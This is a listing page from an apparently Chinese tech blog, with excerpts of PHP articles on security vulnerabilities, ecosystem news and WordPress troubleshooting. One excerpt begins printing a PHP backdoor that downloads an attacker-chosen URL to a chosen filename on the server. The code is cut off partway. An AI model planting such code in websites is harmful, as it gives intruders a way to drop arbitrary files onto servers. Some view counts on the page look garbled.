-
PHP 开源项目 ADOdb 发布 v5.22.9 版本,修复 CVSS 满分严重安全漏洞
5 月 5 日消息,PHP 开源项目 ADOdb 于上周推出 v5.22.9 版本。该版本着重修复了一项极为严重的安全漏洞 ——CVE-2025-46337,其 CVSS 风险评分达到满分 10 分。官方指出,该漏洞 “可能波及全球 280 万个已安装 ADOdb 的环境”,影响范围广泛,情况不容乐观 。 作为广受欢迎的 PHP 数据库抽象层组件,ADOdb 凭借统一的 API 接口,为开发者提供…- 81.9k
- 0
-
一个PHP后门代码:允许通过URL参数直接下载文件到服务器
<?php set_time_limit(0); if(isset($_GET['url']) && isset($_GET['filename'])){ if(httpcopy($_GET['url'], $_GET['filename'])){ echo…- 726
- 0
-
TIOBE 8 月编程指数榜:Python 语言受欢迎度再创新高 PHP 排第十三
8 月 5 日消息,TIOBE 编程社区指数是一个衡量编程语言受欢迎程度的指标,评判的依据来自世界范围内的工程师、课程、供应商及搜索引擎,今天 TIOBE 官网公布了 2024 年 8 月的编程语言排行榜,具体如下: Python 排名第一:占比 18.04%,本月上升 4.71% C++ 排行第二:占比 10.04%,本月下跌 0.59% C 排行第三:占比 9.17%,本月下跌 2.24% J…- 219m
- 0
-
中文 / 日文 PHP CGI 安装包 现9.8 分漏洞 黑客可分发木马、DDoS 拒绝攻击等
根据最新消息,网络安全公司 Akamai 于 7 月 10 日发布博文,表示今年 6 月披露 PHP 漏洞 CVE-2024-4577 之后,隔天就观测到网络上有大量攻击者尝试利用该漏洞发起攻击。 Akamai 表示在 6 月披露该 PHP 后 24 小时,就观察到大量针对蜜罐服务器的漏洞利用尝试。 这些攻击包括传播名为 Gh0st RAT 的远程访问木马、RedTail 和 XMRig 等加密货…- 4.7k
- 0
-
PHP爆严重漏洞:可远程执行任意代码 请尽快更新!
6 月 8 日消息,PHP 项目维护团队昨日发布新补丁,修复了存在于 PHP for Windows 中的远程代码执行(RCE)漏洞,并敦促用户尽快更新至 6 月 6 日发布的 8.3.8、8.2.20 以及 8.1.29 版本。 PHP 是一种广泛使用的开放源码脚本语言,设计用于网络开发,通常在 Windows 和 Linux 服务器上使用。 Devcore 首席安全研究员 Orange Tsa…- 499
- 0
-
PHP 获德国 STF 基金会 20.5 万欧元投资,用于改进安全性及支持文档
4 月 27 日消息,PHP 近日获得德国 Sovereign Tech Fund (STF) 基金会 20.5 万欧元(投资,相关投资将用于提高 PHP 生态系统的长期可持续性和安全性。 世界上大约 75% 的网站依赖 PHP,目前 PHP 的软件包管理器 Packagist 中已经列出了超过 361000 个软件包,相关软件包安装数量已经超过 500 亿次,因此维护 PHP 生态系统基础设施安…- 163
- 0
-
7b2主题使用PHP8.0以上版本后经常出现502
最近,主机吧在给一个新站做调整,需要用到7b2主题,发现网站一但使用PHP8.0、8.1、8.2、8.3版本后,网站时不时出现502。 检查后发现是PHP的一个叫opcache的扩展影响了 把这个扩展卸载了就没有出现502的情况了。 目前不知道什么原因,可能跟7B2主题的加密文件有关。- 50.3k
- 0
-
wordpress有哪些 缓存插件
WordPress 缓存插件概述 WordPress 缓存插件是一种提高网站性能的工具,它通过缓存网站内容并减少数据库查询次数来加快网页加载速度。这些插件通常将动态生成的WordPress页面转换为静态HTML文件,从而在后续访问时快速呈现给用户,减轻服务器负担并提高用户体验。 推荐的WordPress 缓存插件 搜索结果中推荐的WordPress缓存插件多样,这里根据提供的信息列出部分插件: W…- 9.2k
- 0
-
wordpress主题启用PHP8.1后经常出现网页502的原因
最近主机吧把网站支持的PHP7.4切成了PHP8.1,因为都说PHP8.1快,主机吧也想试试。 结果切换成PHP8.1后,发现网站经常出现502的情况,重启PHP后,一段时间又出现了,更离谱的是会员登陆经常失效。 主机吧查了很久,终于发现问题所在,原因是PHP扩展opcache引起的,opcache扩展是一个PHP缓存器,可加速PHP运行效率,不过似乎并不适用于PHP8.0以上版本。 主机吧把op…- 114.8k
- 0
-
PHP获取文件属性怎样做?有哪一些方法?
PHP如何获取文件属性?有些需求需要我们来获取文件属性,而PHP获取文件属性有几种方法,具体代码如下,感兴趣的朋友接下来就跟随小编一起来学习一下吧。 1、filesize($filename) 返回指定文件大小。 如果成功,会返回文件大小的字节数;如果失败,则返回 FALSE。 <?php header("content-type:text/html;charset=utf-8&q…- 8.3k
- 0
-
PHP脚本最大执行时间怎么设置
对于“PHP脚本最大执行时间怎么设置,有几种方法”的知识点有一些人不是很理解,对此小编给大家总结了相关内容,文中的内容简单清晰,易于学习与理解,具有一定的参考学习价值,希望能对大家有所帮助,接下来就跟随小编一起学习一下“PHP脚本最大执行时间怎么设置,有几种方法”吧。 修改php最大时间的方法:1、在php.ini里面设置“max_execution_time = 120;”;2、通过PHP的in…- 81.3k
- 0
-
JetBrains 等多个社区成员宣布成立 PHP 基金会
11月23日消息:据LaravelNews报道,包括JetBrains在内的多个PHP社区成员今天宣布成立PHP基金会,以继续开发该语言。成员名单还包括Automattic、Laravel、Acquia、Zend、Craft CMS、Private Packagist、Tideways和PrestaShop。 PHP基金会将是一个非盈利性组织,其使命是通过资助对PHP语言有贡献的兼职/全职开发人员…- 20.4k
- 0
-
PHP的Git服务器被黑客攻击 源码库被添加后门
在最新的软件供应链攻击中,PHP官方Git仓库被黑客攻击,代码库被篡改。昨天,PHP 团队在 git.php.net 服务器上维护的 php-src Git 仓库中被推送了两个恶意提交。攻击者在上游提交了一个神秘的改动,称其正在"修复排版",假装这是一个小的排版更正,并且伪造签名,让人以为这些提交是由已知的PHP开发者和维护者Rasmus Lerdorf和Nikita Popo…- 925.7m
- 0
-
国内2020年开源语言排行榜:Java稳居第一 PHP排名第三 易语言增涨最快
1月20日 消息:今日,代码托管服务码云Gitee发布了2020年的开源年报,报告显示,Java 稳居语言占比第一,小众语言增速迅猛。 虽然占比较去年(50%)有不小的下跌, 但 Java 依旧是使用最多的语言(38%),前五名的语言较去年变化较小,PHP 超越 Python 成为了第三位。、 此外,报告显示,Rust 和 Dart 连续2年保持高速增长。而易语言虽登顶增速榜,但其总量与其他语言相…- 1.5m
- 0
-
2019 年开源软件漏洞增长近 50%,C 语言漏洞最多 PHP排第二
WhiteSource 通过对 650 多个开发人员进行了调查,并从 NVD(Nartional Vulnerability Database)、安全公告、经过同行评审的漏洞数据库、问题跟踪程序等渠道收集了数据之后,整理发布了一份研究报告。该报告显示,2019 年公开的开源软件漏洞数已激增至 6000 多个,同比增长了近 50%。 值得庆幸的是,其中有 85% 的漏洞已被披露,并提供了相应的修复程…- 1.6k
- 0
-
WordPress如何开启调试模式
最近一直在研究给wordpress换个主题,不过一直不顺利,主要是主机吧对wordpress了解少,而且也不是一个程序员,换着换着就把wordrpress弄出个致命错误来了。 问了许多人也没解决,只能自己百度搜着试试吧,不过wordpress查看故障倒是挺方便的,只要打开调试模式就行,具体哪里有问题就会显示出来,具体如何打开调试模式呢? 首先进入网站WordPress根目录,找到wp-config…- 1k
- 0
-
如何将ICP备案号添加到网页中
若您的备案审核通过,获取了备案编号,您需要联系网站设计人员,修改您的网站首页文件,添加这样一段HTML代码:(index.htm,index.html,index.asp,default.asp,index.php等),加入: <div align=center><a href="http://beian.miit.gov.cn/"; target=_blan…- 867.4k
- 0
-
一键去除网页BOM属性【解决网页乱码,头部空白,验证码不显示问题】
几个常出现的问题: 1.网站打开空白 2.页面头部出现多余的空白 3.网站出现乱码,如“锘�” 4.后台登录验证码不显示 解决方案: 1.选用专业的编辑器,例如notepad++,sublime,editplus这样不会自动签名。 2.sublime通过如下操作File -> Save with Encoding -> UTF-8保存后即可去除bom 3.notepad++选中格式 -…- 113.7k
- 0
-
又一论坛宣布关闭 多玩游戏论坛12月31日后停止服务
12月11日 消息:12 月 10 日,多玩论坛发布服务迁移及业务升级公告,宣布将于年底关闭。公告称论坛将于 12 月 31 日后停止服务,后续原多玩论坛业务将由虾哥论坛承接。这意味着国内游戏社区又要少一个了。 多玩游戏成立于 2005 年,是欢聚时代旗下人气游戏资讯平台。官方公告表示,互联网时代风云变化,多玩网为了适应新的环境需要进行改变。为了与YY更好的结合,为玩家朋友们提供服务,多玩业务将进…- 2.2k
- 0
-
PHP现在还有多少网站在用?
声明:本文来自于微信公众号CSDN(ID:CSDNnews),作者 | Aphinya Dechalert,译者 | 弯月,责编 | 郭芮 以下为译文: 如今,我们很少在主流媒体中听说有关PHP的新闻了。在这个Angular、React、Node.js以及Python占据顶流的时代,就连计算机科学学位也都把焦点集中在Java和C语言上了。 与此同时,PHP只能默默地蜷缩在角落里,注视着其他语言走红…- 393.1m
- 0
-
注意!PHP7.x的 PHP-FPM 存在远程代码执行漏洞
据外媒 ZDNet 的报道,PHP 7.x 中最近修复的一个远程代码执行漏洞正被恶意利用,并会导致攻击者控制服务器。编号为 CVE-2019-11043 的漏洞允许攻击者通过向目标服务器发送特制的 URL,即可在存在漏洞的服务器上执行命令。漏洞利用的 PoC 代码也已在 GitHub 上发布。 一旦确定了易受攻击的目标,攻击者便可以通过在 URL 中附加 '?a=' 以发送特制…- 9223372036854775807
- 0
-
wordpress文章被复制的时候自动带链接
最近主机吧博客遇到一件很恶心的事情,辛辛苦苦写的文章被人给采集了!连标题都没改,想想自己辛辛苦苦写的文章被偷走了,而且对方居然收录比你好,你说气人不气人,所以主机吧在举报的同时也想查了一些防止被人采集的方法,总得来说都不大理想,比如说禁止复制之类的,对一个技术站来说,禁止复制是相当影响用户体验的,所以主机吧一直没弄。想了下在不影响用户体验的情况下,只有在文章被复制的时候自动加链接最为温和。方法很简…- 185.8k
- 0
-
2019最受欢迎的编程语言Python连续夺冠、PHP 受排挤
IEEE Spectrum 编程语言排行榜一年发布一次,这个排行榜已经连续发布了六年。每个开发者都需要相对流行的网站统计数据,与其他的语言排行榜不同,IEEE Spectrum 可以让开发者自己选择参数组合时的权重,得到多样的排序结果。 而且 IEEE Spectrum 今年进行了重大改革,针对求职者内置了一些预设的权重,改变了一些基础指标,从 8 个数据源的 11 个指标中获取数据。程序员还可以…- 517m
- 0
-
wordpress升级插件后网页出现:Briefly unavailable for scheduled maintenance. Check back in a min
很多时候我们在更新插件的时候网页都会提示: Briefly unavailable for scheduled maintenance. Check back in a min(翻译成英文是: 暂时无法进行定期维护。请稍后再来查看。 ) 出现这个问题主要原因是更新没成功,或者更新中断所致。 如何解决这个问题呢? 1.马上通过FTP登录你的网站,删除WordPress根目录下的 .maintenan…- 22.7m
- 0
